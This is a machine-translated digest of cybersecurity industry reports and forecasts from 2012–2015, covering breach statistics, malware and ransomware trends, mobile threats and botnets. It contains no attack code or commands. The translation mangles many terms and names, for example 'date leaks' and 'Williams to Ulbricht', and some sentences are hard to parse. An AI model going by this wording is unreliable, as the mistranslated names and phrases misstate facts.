Theft of personal and identification data remains a main type of date leaks to which share 75% of all compromised records fall, and it is slightly more than a half (53%) of all date leaks recorded in 2015. Five of ten largest leaks, including three the largest, received the status catastrophic by the Gemalto Index, represented plunder of such data. For comparison, for the same period of last year it was the share of plunder of personal and identification data seven of ten largest incidents.

Date leaks on the industries

As for statistics on the industries, about two thirds of all compromised records (31% and 34% respectively) were the share of leaks in government agencies and in the industry of health care in spite of the fact that this year only 21% of the total number of leaks, in comparison with 29% were the share of the industry of health care the previous year. In the sector of retail considerable decrease in number of the stolen records to which share only 4% of total number of the compromised data fell was observed (in comparison with 38% last year). By regions the greatest number of leaks – more than three quarters (76%) occurred in the USA where about a half (49%) of all data was compromised. 26% of all compromised data fell to the share of Turkey that, mainly, is caused by large-scale leak in GDPCA where because of malicious actions of third parties 50 million records were compromised.

Level of the enciphering used for protection of the opened data (and allowing to lower considerably a possible loss from date leaks), increased slightly - to 4% of number of all incidents (in the first half of 2014 this indicator was 1%).

According to Forrester, malefactors use more and more perfect and difficult mechanisms of the attacks therefore the efficiency of traditional measures of providing security perimeter considerably decreased. Constantly changing and developing nature of threats requires implementation of new security measures, one of which is universal use of technologies of data encryption. In the future the organizations will automatically cipher data – as those which move on network, and those which are just stored on carriers. The approach to security directed to data processing is much more effective in terms of counteraction to hackers. Ciphering confidential data, the organizations do them useless for malefactors therefore attacks to corporate networks will become unprofitable, and hackers will switch to less protected objects. Enciphering becomes the strategic base for heads of security services and risk management departments who are responsible for data protection and for confidentiality of information in the organizations.

Trend Micro Security Predictions

The main forecasts for 2015 from 'Trend Micro Security Predictions for 2015and Beyond: The Invisible Becomes Visible'

  • More and more cybercriminals will address underground networks and the closed forums for exchange and sale of the software of a criminal profile;
  • Increase in activity of malefactors will lead to emergence of more sophisticated instruments of cracking;
  • The increasing role in infection of devices will be played by mobile vulnerabilities; sets of exploits directed to Android will gain distribution
  • The purposeful attacks will become the most widespread type of cyber crime
  • New methods of mobile payments will lead to emergence of new threats
  • We will see new attempts of use of vulnerabilities in applications with the open code
  • A variety of technologies for the present protects structures of the Internet of all (Internet of Everything) from the mass attacks, however it cannot be told about data which they process
  • There will be new, even more dangerous threats for online banking and other financial services

Forecasts in the field of the purposeful attacks

According to the report after cybercriminals managed to achieve noticeable results in the USA, the number of the new purposeful attacks in 2015 will grow. Experts expect that hackers in Vietnam, Great Britain and India will continue to use the purposeful attacks, and we will also see the attacks in those countries where they were not marked out earlier how it occurred in Malaysia and Indonesia.

Forecasts in the field of threats for financial services

Substantial increase of level of threats expects banking sector, increase in number of the unique cyber attacks aimed at banks and other financial institutions is predicted. With respect thereto, financial institutions should implement two-factor identification for the online services.

Forecasts in the field of threats for "All Internet"

The report of "Trend Micro Security Predictions for 2015" is also predicted by increase in use of vulnerabilities of "smart devices", such as cameras, the different household systems and TVs as cybercriminals more and more aggressively attack these platforms and the organizations, managing their data.

Such factors as market pressure, stimulate producers of devices to release more and more smart systems, however they not always manage to provide security issues in a pursuit of demand. Therefore cybercriminals will find even more often vulnerabilities and to use them in the purposes.

HP Cyber Risk Report

On February 24, 2015 HP was published by Cyber Risk Report — the report on cyber security for 2015 containing analysis results of the most burning issues which business faced in 2014 [32]

Staff of division of HP of Security Research studied widespread vulnerabilities which threaten security of the organizations. According to results of a research, "old", well-known vulnerabilities and incorrect configurations became basic reasons of problems in the field of cyber security in 2014.

"Technologies of cyber defense are continuously improved, however we should not "lose sight" of old vulnerabilities — Art Gilliland, the senior vice president and the head of department of Enterprise Security Products, HP says. — We found out that the most serious risks for security are connected with vulnerabilities about which we know for a long time. And we cannot move forward, having forgotten about these problems".

Main results of a research

  • 44% of the known incidents of security are connected with vulnerabilities to which 2–4 years. Malefactors continue to use "old" methods for cracking of systems and penetration into networks. The largest attacks of 2014 were carried out using vulnerabilities in the code written several years or even decades back.
  • Incorrect configurations of servers is problem number one. According to results of a research, the main problem connected with an incorrect configuration is providing too broad access rights to files and folders. Information which is obtained by malefactors then is used for commission of other attacks.
  • In 2014 cybercriminals actively used new channels for commission of the attacks, for example the physical devices connected to network through Internet of Things. Besides, growth of number of malware for mobile devices was observed. Expansion of a computing ecosystem plays into the hands of malefactors as creates for them even more "points of entry" in systems.
  • Malfunctions and errors, including logical are basic reasons of emergence of vulnerabilities in the software. The majority of vulnerabilities arises because of a small number of widespread errors in the code. Cybercriminals quickly "master" old and new vulnerabilities in the software.

What it is necessary to make to secure itself?

  • Implement the complex strategy of use of corrections. Maintenance of systems in current status significantly reduces the probability of the successful attack.
  • Regular testing for penetration and check of configurations (by own efforts or using the external organizations) will allow to reveal errors in configurations before hackers use them.
  • Before implementation of new technologies it is useful to analyze as they will affect the overall level of security.
  • Effective data exchange about threats will help to make idea of tactics of malefactors and to take measures for prevention of problems, to improve protective software to strengthen security in general.

CyberEdge Group Cyberthreat Defense Report: More than a half of the companies are afraid of successful cyber attacks against them in 2015

On August 10, 2015 results of the annual report of Cyberthreat Defense Report of CyberEdge Group company where information on determination by professionals in the field of IT safety of cyberthreats and methods of fight against them contains are published.

More than 800 heads of departments of IT security and the practicing specialists - representatives of 19 different industries of business took part in report generation.

Report on counteraction to threats, 2015

Several digits of statistics:

  • more than a half (52%) of respondents assume that their companies will become the victims of successful cyber attacks in 2015. In 2014 39% of survey participants fell to their share.

  • as key cyberthreats respondents call attacks on web applications. Web applications are widespread in the modern companies and often are in the center of attention of malefactors. For this purpose there is a lot of reasons, not last of which - a possibility of direct access to confidential data.

  • concern causes security of mobile devices in specialists. At assessment of capabilities of the companies to be protected from cyberthreats in different areas of interest of IT, respondents gave the lowest marks to mobile devices.

Alarm level as cyber attack, 2015

Then in rating there are notebooks and applications for social networks. More than 2/3 organizations which participated in poll want to replace or upgrade the instruments of protection of end devices which are already available for them. Respondents noted - use of approach of use of own devices in the working purposes (BYOD) will increase practically by two times – from 30% to 59% within this year. It indicates the need of additional investment into mobile security.

According to survey participants, the SDN technology can render positive influence on protection against cyber attacks – 63% of respondents separate this point of view. At a question of how SDN has an impact on capability of the company to fight against cyberthreats, the number of respondents which consider this technology the useful solution considerably exceeds the number of survey participants who do not separate such confidence of colleagues (the ratio is at the level of 10 to 1).

The security level in relation to the IT field, 2015

62% of respondents specified - in 2015 the budget should be increased by IT protection. Experts advise special attention at distribution of means to turn on aspects:

  • protection of the next generation for end and mobile devices;
  • quickly developing services of investigation concerning cyberthreats;
  • software-defined solutions for protection.

Positive Technologies: top trends of cyber attacks of 2015

On October 15, 2015 representatives of Positive Technologies company made a speech at the "Trends of Development of Crimes in the field of High Technologies — 2015" conference.

Discussing hi-tech crimes and cyberthreats, the head of department of monitoring of Positive Technologies Vladimir Kropotov and the leading analyst Evgeny Gnedin made the report "Statistics and trends of cyber attacks in a year: we look outside, from within and sideways". Experts noted top trends of cybercrimes of the current year:

  • the mass character was accepted by the attacks at which malefactors circumvent — for example, crack partners of the attacked organization
  • the quantity of cases when the social engineering is used together with technology methods grew. Cybercriminals get access to the partner's mail (or find out his e-mail address and especially for the attack create the similar domain) and enter into a correspondence to the victim which does not guess substitution
  • growth of the attacks directed to cracking of a certain person, group of persons or the specific companies. But if earlier criminals, as a rule, acted through cracking of workstations, then in 2015 30% of the analyzed attacks are made on corporate resources (mail servers, database servers, internal web services). Investigating the purposeful attacks experts noted the advanced technologies, such as Watering Hole complicating identification of the attacks by the profile organizations and allowing to mask the target attacks under mass.

Also any equipment connected to the Internet (Internet of Things) is exposed to the attacks. Criminals use that users seldom install on such devices of updating owing to what they become vulnerable for threats from the Internet. There is a lot of similar devices in network: routers, "smart" TVs, heat sensors and cars. Malefactors can quickly get access to one hundred devices using the computer, use them for DDoS attacks or creation of botnets, at the same time remaining unnoticed. The feature of these devices is that if to reboot them or to power off, then all traces of the attacks will be erased.

Specialists of Positive Technologies announced results of works on audit of incidents of security, source codes of applications and monitoring of cybersecurity. 16 systems of the large companies and the state organizations (Russian and foreign) underwent a research concerning which works on external testing for penetration in 2014 — 2015 are carried out.

Statistics of the company confirms an opportunity in 44% of cases to receive full control from the outside over all systems of a corporate structure, and the privilege of the administrator in the crucial systems (databases, electronic mails, workstations of heads) — in 33% of cases. At the same time in 58% of systems for receiving full control by malefactors over crucial resources of rather low qualification, in 26% — the complexity of access to them was average and only into 16% – they did not manage to get in corporate network. In most cases (56%) cybercriminals used the existing vulnerabilities of web applications, in 26% acted by selection of the dictionary password.

"Our research showed that only 20% of the analyzed attacks used vulnerabilities of zero day, i.e. earlier unknown. It means that in 80% of cases the victims had an opportunity to be protected effectively, but it did not use" — Vladimir Kropotov noted.


Experts of Positive Technologies note a tendency to complication telecommunication of networks. Due to the development of services Skype WhatsApp, Google revenues of mobile operators were reduced. Search of new opportunities for profit earning became a current problem for them: the companies offer not only cellular communication, but also the home Internet, IP television and proprietary applications. All this leads to complication of network: earlier for telephony, the Internet and cable television there were separate networks — now they are integrated into one general network. Because of close integration there are risks of violation information security.

Works of Positive Technologies on testing of protection of networks of mobile communication showed that vulnerabilities of cellular transmission networks on the basis of SS7 technology allow the malefactor even with low qualification to implement the attacks, such as disclosure of location of the subscriber, violation of availability of the subscriber, interception of Sms, counterfeit of USSD requests and money transfer with their help, redirection of voice calls, interception of a talk, violation of availability of the mobile switch. According to Positive Technologies, most telecom operators are not protected from the similar attacks. However positive dynamics was outlined: now telecom operators are interested in monitoring of security of the networks. Next year experts predict increase from their party of demand for cybersecurity services.

84 million new samples of malware, are 9 million more, than in 2014

PandaLabs, anti-virus laboratory of Panda Security company, during the whole 2015 detected and neutralized over 84 million new samples of malware that is nine million more, than for 2014. Such level means that every day during 2015 about 230,000 new samples of malware appeared.

Last year showed the greatest number of the cyber attacks recorded worldwide within which about 304 million models of threats were used. Therefore, more than a quarter of all samples of the used malware were made in 2015 (27.63%).

Last year also was difficult for a number of multinational companies which suffered from large-scale thefts of data and negative impact on the IT systems.

The most powerful threats in 2015: trojans and PNP

In 2015 trojans, PNP (potentially undesirable programs, PUP) and the separate Cryptolocker families seeded fear among the large companies around the world by means of the massive attacks and theft of thousands of confidential files.

Trojans continue to remain the main source of malware (51.45%), having comfortably been located ahead of other types: viruses (22.79%), worms (13.22%), PNP (10.71%) and spyware (1.83%).

In addition to trojans, Cryptolocker (ransomware belongs to programs encoders) was the main hero of cyber attacks during the whole year. According to Korrons, "Cryptolocker is the best choice for cyber-criminals since it is one of the easiest ways of earnings of money. Besides, it proved to be very effective, especially in a case with the enterprises which long do not think at payment of the redemption for recovery of control over the stolen information".

The largest infections are caused by trojans

Among all types of malware which led to large infections around the world trojans showed the highest level of infection (60.30%), but their indicator decreased by 5% in comparison with 2014.

PNP also had rather negative impact: about a third of cases of infections used technology of deception for penetration on the PC of the victims. Far behind in this "rating" there were such types of threats as advertizing and spyware (5.19%), worms (2.98%) and viruses (2.55%).

China remains one of the most infected countries of the world

Last year was remarkable the fact that it showed the highest levels of infections on computers. In the geographical plan China was the country with the biggest level of the infected computers (57.24%), and this indicator was about 30% higher, than in 2014. Taiwan with the infection level of 49.15%, and on the third place – Turkey (42.52%) was located with a trace. These three countries still remain at top of this rating of infections as it was in 2014 and 2013.

Ten the most infected countries of the world did not include the following countries which showed infection level above the average world values: Colombia (33.17%), Uruguay (32.98%) and Spain (32.15%).

The Scandinavian countries showed the lowest level of infection

Nine countries present Europe in ten less infected countries of the world, and only Japan was the only country from other continent.

The Scandinavian countries took all three upper positions: Finland showed the lowest level of infection of 20.32%, Norway (20.51%) and Sweden follow further (20.88).


It is better to pay, than to protect?

A half of financial institutions in Russia compensates to the clients the losses suffered by them as a result of Internet fraud without conducting investigation. 31% of the companies, are ready to consider the possibility of compensation after internal investigation of an incident, and 8% for this purpose are required external investigation. Such data were obtained during the special research about the relation of business companies to cyberthreats conducted by Kaspersky Lab together with the independent agency B2B International in 2014.

As experts found out, many organizations working with online payments are ready to allow inevitable monetary risks if only not to invest in specialized IT protection. So, a quarter of the companies is still sure that the expenses provoked by cyberthreats it is less, than costs for protective solutions. It is surprising that among the financial institutions most directly related to online transactions with money, the share adhering to the same position even is higher – 33%.

According to the data obtained using cloud infrastructure of Kaspersky Security Network in 2013 nearly 4 million users of products of Kaspersky Lab faced attempt of theft of their money using special malware (in comparison with 2012 the indicator grew by 18.6%). This fact shows the increasing interest of malefactors in electronic payments, and the similar trend will inevitably lead to the fact that expenses which the companies will incur in connection with compensation payments will appear significantly more, than investments into protection against similar cyberthreats.

"Besides that financial companies budget separate funds for compensation of a stolen property, they also incur expenses on processing of client complaints. But the most important even if will quickly return to injured money, it will think and whether it is worth using services of bank which cannot ensure safety of its online account? It is better to prevent losses, but not to compensate" — Alexander Ivanyuk, the senior manager on development of the direction of business solutions of Kaspersky Lab for financial companies comments on a situation.

Gemalto: Overview of leaks and thefts of data

The Gemalto company published in February, 2015 results of the Index of criticality of date leaks (SafeNet Breach Level Index, BLI) according to which more than 1500 date leaks taking place in 2014 led to the fact that worldwide about one billion data writings were compromised. These data mean that the number of date leaks grew by 49%, and the number of the stolen or gone data increased by 78% in comparison with 2013.

Continuing this comparative analysis which was developed in SafeNet company, Gemalto acquired company, the Index of criticality of date leak (BLI) is the global database about the happening date leaks which provides to specialists in the field of security the technique allowing to estimate gravity of leak and to define its place among leaks, information on which is disclosed publicly. BLI estimates weight of date leak by different parameters on the basis of information disclosed on leak.

According to data in BLI base, theft of personal data was the main motivation for cybercriminals in 2014; this type of data theft made 54% of all leaks and exceeded all other categories, including access to financial information. Besides, the date leaks connected with theft of personal information were one third of the most serious leaks which were characterized by BLI or as catastrophic (9.0-10 points on a scale of BLI) or as serious (7.0-8.9 points). The number of violations of security, including violations of security perimeter where the compromised data were ciphered in whole or in part, increased from 1% to 4%.

In 2014 not only there was a shift towards increase of thefts of personal data; leaks also became more serious: two thirds from 50 most serious leaks according to point of BLI took place in 2014. Besides, the number of date leaks, including more than 100 million compromised data writings, in comparison with 2013 grew twice.

From the point of view of branches of the economy, in 2014 retail and financial services underwent the most notable changes in comparison with other sectors. In retail trade the number of date leaks slightly increased in comparison with last year, having been 11% of all date leaks of 2014. However if to speak about the compromised data writings, their share in retail trade grew to 55% in comparison with 29% last year because of increase in number of the attacks directed to the systems of sales points. For the sector of financial services the number of date leaks remains rather stable from year to year, but the average record count, lost as a result of each leak, increased ten times, from 112,000 to 1.1 million.

According to BLI, in general in 2014 at implementation of the attacks, personal data remained a main objective of cybercriminals. 54% fell to the share of such incidents. Most often information is stolen from retailers. Hackers, having cracked IT systems of retail chain stores, obtain such personal data as:

  • data on payment cards,
  • information specified at execution of the discount or club card
  • data on the residence,
  • mobile phone number, etc.

Affirms as annual reviews of information security that most often data flow away thanks to the staff of the companies. It occurs or on malicious intent, or by negligence. The third-party rival companies steal information as often as hackers.

Most of all information leaks in 2014 were fixed in the USA. It is explained by special scrupulousness with which Americans treat the personal data. For example, in one of health facilities in the USA in March, 2014 the insider who copied personal data of patients was detected. Only four patients could become the victims of theft of information, but several thousands of patients addressing to medical institution for several years as a result suffered while there the insider worked.

The index of criticality of date leaks (BLI) includes the centralized global database of leaks and provides assessment of level of this or that date leak by different parameters, including on data type and the number of the stolen records, a leak source and also on whether there were flowed-away data are ciphered. Each leak gets a certain point, thus, the BLI index represents the comparative table of leaks allowing to distinguish small and insignificant incidents from really large and significant leaks. The data which entered the BLI database are based on publicly available information on leaks.

Global Cyber Executive Briefing "Deloitte Tush Tomatsu Limited"

In the report of Global Cyber Executive Briefing of "Deloitte Tush Tomatsu Limited" it is said that practically all organizations therefore it is necessary for top managers will be subject to cyber attacks as it is possible to delve deeper into an essence of key threats and also to define the most vulnerable assets (as a rule, it is those from them which are the cornerstone of business).

"If earlier for obtaining benefit malefactors needed physical presence and direct contact with an object to which illegal acts are directed, then now everything became much simpler. Presently, when technologies develop every year quicker and quicker, extremely high value was purchased by information, ― Sergey Bukhanov, the director of Department of risk management of the organizations in company Deloitte, CIS notes. ― the Vast majority of the most "profitable" crimes for malefactors are committed far off today what news feeds of the last months eloquently testify to: plunders of money from accounts of hundreds of clients of popular network of payment terminals; plunder of personal data about payment cards of hundreds of thousands of citizens which performed purchases of tickets via the website of one of the largest transport companies of the world that forced some banks to block or limit functionality of plastic cards of several thousand clients. In addition we often learn about exposure of the bank employees who used excess privileges for illegal transfer of means of clients into personal accounts or issues of the bank guarantee by means of not authorized use of the SWIFT system. Considering all this, more and more heads of the different companies around the world come to understanding of importance of the arising threats and pay special attention to questions of information security when using information technologies. It is also important to note that for last several years the legislation of the Russian Federation in the areas connected with questions of security of use of information technologies and personal data protection was improved. So, new standards of the Central Bank of Russian Federation on information security support of banking systems are published; issues of gain of responsibility for the crimes in banking sector committed for the purpose of plunder of money using high technologies are discussed".

According to report outputs reliability assurance begins with determination of weaknesses of application programs and gain of digital infrastructure. Respectively, the organizations which want to show vigilance should be ready to detect any attack as soon as possible. Fast mobilization includes early direction finding of action of threat, the reason of the attack and how it will be shown. Fast identification of the attack can become for the organization a signal to action and thus help to localize and eliminate threat.

The main outputs of the report, including threats for the companies on the industries:

  • High technologies: such companies constantly are the purpose of the attacks which pose in themselves threats of the largest losses of intellectual property and also are most subject to a haktivizm. Threats are also used as means of the attack and infection of other companies.
  • Online media: such companies are most subject to cyber attacks for the purpose of causing damage of their reputation. Threats are used as means of the attack and infection of other companies.
  • Telecommunications: these companies face the increased level of technically difficult attacks, including from the government agencies using purposeful steady threats for establishment of the hidden shadowing for the long period. Other significant threat inherent only in the sector of telecommunications, is an attack on the rented technical equipment, such as home routers of Internet service providers.
  • E-commerce: in this case cracking of the database takes place mainly (i.e. data loss of clients, including their names, the actual addresses and phone numbers). Such vulnerable areas as the systems of carrying out online payments are often attacked. The most widespread type of the attack is the call of the answer of the Failure in Service system. In particular, it is used by haktivist who want to break work of the organization as the most noticeable method.
  • Insurance: the companies of this sector, as a rule, work with the large volume of sensitive data which need to be protected. Frequency of cyber attacks in this sector grows in geometrical progression because insurance companies pass to digital channels of service. The attacks become harder and harder technically, combining the advanced malicious software and other technologies, such as psychological attack. While the current attacks are represented short-term, in the report the possible growth of the long-term attacks which are not drawing great attention yet is predicted.
  • Manufacturing industry: in this sector growth of number of the attacks from hackers and cybercriminals is observed and also corporate espionage. Types of cyber attacks to the companies of manufacturing industry vary from a phishing before use of the advanced malicious software and are aimed not only at IT-systems, but also at the related systems of industrial control.
  • Retail: in this sector data of credit cards actually are new currency for hackers and criminals. In the field of a retail threats of leak of the insider information increase that promotes formation of new type of criminals. Theft of information, in particular the valuable data on card holders which consumers and retailers exchange becomes their purpose.


Zurich: 2013 became the most successful for cyber-criminals

740 million confidential files were stolen or illegally browsed by cyber-criminals in 2013. 2013 became the worst in this indicator during all the time. Such data are provided by the research prepared by Zurich Insurance Group insurance company together with the analytical agency Atlantic Council.

In a research it is said that about 2.5 billion people - nearly a third of all population of the earth - regularly use the Internet, and on average about 6 gadgets connected to world network are the share of each person. Every minute 204 million e-mails go, 640 terabytes of data are transferred and 100,000 tweets are published.

At such volume of circulation of data confidential information is in very vulnerable provision which can become the reason of serious economic shocks. For today in the world there are no sufficient technologies capable to protect individuals and the organizations from all cyber-risks. If the company is not capable to mitigate these difficult and interconnected risks, then the probability of a sudden shock comparable on scale to crash of Lehman Brothers in mortgage market in 2008 increases.

The conducted research selects four sources of cyber-risks - it is criminals, hackers, spies and military.

Criminals usually use the stolen information for the purpose of its sale. More often than others the organizations working with personal data of the clients suffer from them. Hackers act on a more substantial scale – they break work of networks of the companies or abduct information which can compromise the organization or the person.

The third traditional cyber-threat is espionage which purpose are researches of the companies, the latest developments, the strategy of negotiations and business plans. History of last year when the Chinese hackers stole drawings of the new building of intelligence service of Australia can be a striking example. The fourth group - military. They specialize in the collapse of the whole networks and systems, including infrastructure and industrial. It, however, happens quite seldom.

The list of these risks can be added with new already tomorrow – invasion into cloud computing, into the system of cars "without drivers", medical devices and intelligent power supply systems (smart grid). More and more close connection of the Internet with real economy and society can lead to a large-scale shock, even to more serious, than to recognize ready risk managers and Internet specialists. Banks, water supply systems, cars, medical devices, dams of hydroelectric power stations can undergo the attack.

Creation of alternative networks on a case of cyber attacks and also special attention of top management of the companies to data protection can become an exit in this situation. Today in the majority of the company do not fix the facts of cyber attacks, and often do not even know that their confidential data already became property of cyber-criminals.

At the existing dynamics of increase of cyber-threats insurance upon cyber-risks in the near future can turn from category of exotic into category of standard insurance options, and the sphere of activity risk engineers will be replenished with monitoring of the systems of effective electronic information.

  • Threats for finance. In 2013 considerable distribution was gained worldwide by the new malware for cracking of the systems of online banking; the attacks using programs racketeers (to enough remember the notorious Cryptolocker program which ciphers data of the user and then suggests to pay for interpretation) became more and more frequent (according to the report of Trend Micro Incorporated devoted to a landscape of cyberthreats in 2013 by "Cashing in on Digital Information" ("Monetization of digital information")
  • Mobile threats. Threats for mobile platforms considerably evolved in the plan of quantity and level of complexity. It is connected with the fact that there are more and more hacker programs which were initially created for the PC were "reoriented" on mobile platforms. By the end of 2013 the total quantity of the detected harmful and dangerous applications for Android reached a point of 1.4 million. Users of products of Apple also cannot consider themselves absolutely protected from these dangers. Cybercriminals aim "master" this wide, and therefore attractive audience of the potential victims. It is no wonder that in 2013 the number of phishing attacks grew by users of platforms of Apple.
  • Personal information protection. Accounts of users on social networks and cloud storages of data become more and more attractive target for hackers. The aggressive phishing attacks dated for a release of different sign platforms, for example PS4 and Xbox One threatened data security of millions of users.
  • Attacks on infrastructure. Resonant cyber attacks in South Korea showed that today hackers "can" to organize large-scale actions against crucial elements of infrastructure.
  • Unsupported software. The concerns connected with the termination of support of some versions of Java and Windows XP OS became one of key questions of 2013. For the last the release of updates and corrections will be stopped in April, 2014.

Cyber attacks to IT corporations and media

2013 was remembered by a number of milestone events, one of which was a series of cyber attacks to the leading media and IT corporations located mainly in the USA, – at different times editions of the New York Times, Wall Street Journal, Washington Post and also Twitter, Facebook, Evernote, Apple and Microsoft underwent the attacks. These attacks in a varying degree led to a personal data leakage of employees of the companies and users of services.

So, the compromise of tens of millions of accounts of clients of the company and also leak of source codes of such widespread products as Adobe Acrobat, ColdFusion and Photoshop became a result of cyber attack to Adobe Systems.

Social networks are open to attack

However, the activity of hackers was directed not only to the IT companies, but also to ordinary users. So, in February experts of ESET detected a malicious code of PokerAgent which infected players in Zynga Poker Facebook-application. Personal data of users and also information on the bank cards linked to their accounts were the purpose of hackers. For obtaining required data the botnet from several hundred infected devices which were carrying out instructions of the command center was created. As a result of PokerAgent stole data more than 16,000 accounts of Facebook.

One more remarkable malware menacing to frequenters of social networks was directed only to the Russian users – the trojan of Win32/Bicololo.A extended using phishing messages under the guise of links to harmless graphic files. At activation of the similar link instead of the image the malware was loaded.

Having got on the computer, Bicololo modified system files that in attempt of the user to visit the website of VKontakte, Odnoklassniki or to check mail for it entered the data on the false page belonging to malefactors.

Phishing attacks on Internet messengers

In 2013 under blow there were not only users of social networks, but also fans of communication via Internet messengers. So, ESET detected by experts large-scale spam campaign in Skype, Gtalk, QIP and some other messengers endangered more than half a million users around the world (including 40,000 users from Russia). By means of phishing messages criminals infected a system with the malware, getting access to personal and authentication data of the victims.

Distribution of spyware among the Polish users became other large attack. Analysts of virus laboratory ESET in Krakow recorded an attack on users of Skype, MSN Messenger, Jabber, GTalk, ICQ and dr messengers. The Spy.Agent program collected information on the visited sites, installed applications, passwords to Wi-Fi and also wrote the messages entered from the keyboard and even listened to calls.

Capture of cybercriminals

But actions of cybercriminals were not left without answer – so, thanks to activity of Microsoft company, in 2013 the botnet Citadel was liquidated. With assistance of law enforcement agencies, providers and intelligence agencies the corporation performed operation on violation of work of one of the world's largest botnets. The damage from its activity at that time exceeded half a billion dollars.

Besides, it was not lucky also Williams to Ulbricht, the founder of the website for trade in Silk Road banned drugs – he was arrested in the USA. At the other end of the world, in Russia, also Ulbricht's "colleague" – the hacker known under the nickname Paunch was delayed. He became famous as the owner of the known set of hackers exploits of Blackhole who was actively used by cybercriminals of the whole world for the hidden penetration into the systems of users.

Threats for TOR

Cybercriminals picked up a trend on anonymity in the middle of the year – then experts of ESET detected the botnet Atrax, technically the most difficult and interesting botnet for the TOR anonymous network. As data transmission in this network – process slow, the botnet was not used for theft of large volumes of data. Instead it collected information entered into authorization forms on different portals and also loaded additional harmful files on the PC. Atrax gets on the PC through the special harmful page disguised under the website of PayPal customer support.

Detect and destroy the command center of this botnet – a difficult task as in this case the anonymity of TOR protects not users, but cybercriminals. It is possible to assume that with growth of migration in "the hidden Internet" we will see new, technology even more perfect threats for TOR.

Mobile threats

Botnets for mobile devices became one more, rather exotic kind of botnets, so far. For the first time recorded in 2012, today the most part of malware for Android contains functionality on consolidation of the infected smartphones and tablets in botnets.

If to speak about mobile threats in general, then, in comparison with the same period of last year, the number of new families of malware for Android (which still make up to 99% of all mobile threats) in 2013 grew by 43.6%, and the speech not only about growth of activity of the known threats, but about emergence of new categories softwares.

  • Loader: tries to load files of other malware from the Internet and to install them on the device.
  • Dropper: installs other threats on the device at start; threats are in a body of the dropper.
  • Clicker: it is intended for generation of traffic on the websites through artificial increase in number of clicks.
  • Bank malware: specializes in theft of confidential information of the user which is used for performing transactions, connected with online banking.

The SMS trojan detected by the products ESET as TrojanSMS.Agent became one of the most active mobile threats (its modifications show especially high activity in Russia and the countries of the former USSR). In 2011 31 modifications of this program were detected, and in 2013 them 324 is recorded already. Such trojans can send secretly from the user messages to paid numbers, devastating the mobile account.

For 2013 the total quantity of malware for the Android platform grew by 63%. The greatest growth rates of Android threats were shown by Iran, China and Russia.

Similar growth rates will remain also in 2014; new mobile threats will show not only quantitative, but also high-quality growth – in particular, will use more and more actively vulnerabilities of mobile platforms and their components.

Programs racketeers

The activity of racketeers in 2013 showed significant growth too – so, experts of ESET detected rapid growth of activity of a trojan encoder of FileCoder which requires the redemption for interpretation of personal files of the user in Russia. In comparison with the average level recorded in the first half of 2013, the activity of FileCoder increased more than by 200%. According to ESET, more than 44% of detection of this program were the share of the Russian users.

Other encoder extended in 2013, CryptoLocker, as the psychological attack used a countdown – the infected user was given only 70 hours on paying the redemption and to get access to the ciphered personal data. Otherwise he said goodbye to them forever.

Nymaim trojan detected by experts ESET can also block the user's computer for the purpose of obtaining the redemption. Earlier infection with this software was performed by means of already mentioned set of the BlackHole exploits, however later cybercriminals were reoriented on distribution through search of Google. Having clicked the malicious URL in search issue, the user instead of required information initiated loading of harmful archive,

In 2014 also you should not wait for decrease of the activity of racketeers – in particular, emergence of new modifications will urge on popularity of a virtual currency of Bitcoin. Thanks to its anonymity and a high rate, cybercriminals will demand even more often the redemption in bitcoins. However, some cybercriminals decided not to extort bitcoins from users, and to steal them directly – so, new modification of the known bank trojan of Hesperbot widespread in Europe is aimed at theft of electronic currency now. Plunder is implemented through gaining access to the e-wallet containing secret keys.


WatchGuard: Suppliers of cloud services will suffer from large-scale network attacks

2012 for the sphere of information security will be difficult and at the same time interesting in terms of development of technologies. We submit the new forecast of WatchGuard for the 2012th in terms of threats in the field of network and information security[33].

In the 2012th the large-scale wave of organized network attacks on cloud services and cracking of large suppliers of cloud computing is expected. At the same time protection of network assets of suppliers of cloud services will reach the new level of development.

Why clouds are extremely interesting targets for cracking?

  • Great number of clients store the confidential data in clouds where they can be easily available to malefactors.
  • When developing cloud services difficult information technologies which can have serious vulnerabilities are used.
  • Most of suppliers of cloud services use the difficult, made to order Web applications and technologies of virtualization which at incorrect settings can pose considerable security risk of data in clouds.

For the organization of the attacks to corporate networks malefactors will use new technologies and the malicious software of APT

In 2012 the malware, difficult and resistant to detection — Advanced Persistent Threats (APT) will actively develop.

In the 2011th the governments of many countries, management systems for production process and the large world companies suffered from APT threats. Using this software RSA SecureID, Transaction ShadyRat were cracked. Besides, there was a successor of the net worm of Stuxnet — the Duqu worm.

It is expected that this year the malware APT will be improved and APT threats will be aimed not only at the corporate sector, but also at ordinary users.

Large leakages of confidential data are expected

Due to the emergence of the difficult malware APT, new authors of the malware and groups of professional hackers, such as Anonymous and LulzSec, in the 2011th occurred much more the incidents connected with large network attacks than in previous years.

It is hard to say precisely what to a large extent influenced so significant increase in number of network attacks. Perhaps, malefactors became more organized, there were many professional groups of hackers or the new regulations requiring were entered that the companies announced all happened attacks and date leaks. Anyway it is expected that the tendency to increase in number of leaks will remain also in the 2012th.

Demand for solutions on ensuring virtual security will increase

In 2012 interest in security solutions of the systems of virtualization among small and medium-sized companies considerably will increase.

Until recently many IT specialists working in small and medium business up to the end did not realize how serious can be risk of data loss at insufficient attention to questions of the correct implementation of virtual environments.

Now the situation will change: in new year demand not only for technologies of virtualization, but also for means of ensuring of information security of virtual environments will grow.

On-line shops of mobile applications for smartphones and communicators 'will help' fast distribution of the mobile malware

Malefactors will still concentrate attention on mobile devices, to be exact on online stores of the mobile software. To avoid threat of infection with the mobile malware, it is necessary to show a certain care when loading mobile applications from on-line shops and also it is obligatory to consider reputation of the seller and developer of the application.

The problem connected with BYOD will result in the bigger number of date leaks

Use by employees of personal mobile devices in working networks of the companies (Bring Your Own Device, BYOD) can lead to serious date leaks.

The specialists supporting permitting employees to use the mobile devices in corporate network say that BYOD will help the companies to reduce significantly the costs connected with the IT sector, to increase labor productivity, to reduce load of technical support services and just to make work of personnel more convenient and comfortable.

But except obvious benefits which are brought by BYOD it should be taken into account that at the same time there is a risk of leak of important information and emergence of the problems connected with centralized operation by these devices.

The Facebook network will remain a main goal for malefactors (network attacks, cracking using methods of social engineering, the malicious software)

In 2011 the Facebook network became the largest source of malicious URLs which overtook in popularity such threat as harmful investments in e-mail.

In 2012 the number of network attacks both on certain users of Facebook, and on network in general considerably will increase. With respect thereto it is expected that this year a large number of updates of a security system of Facebook will appear and the new effective solutions providing network protection will be implemented.

Malefactors will begin to organize the attacks directed to the physical equipment of network infrastructures

This year there will be at least one large network attack directed to putting the physical equipment of network infrastructure out of action.

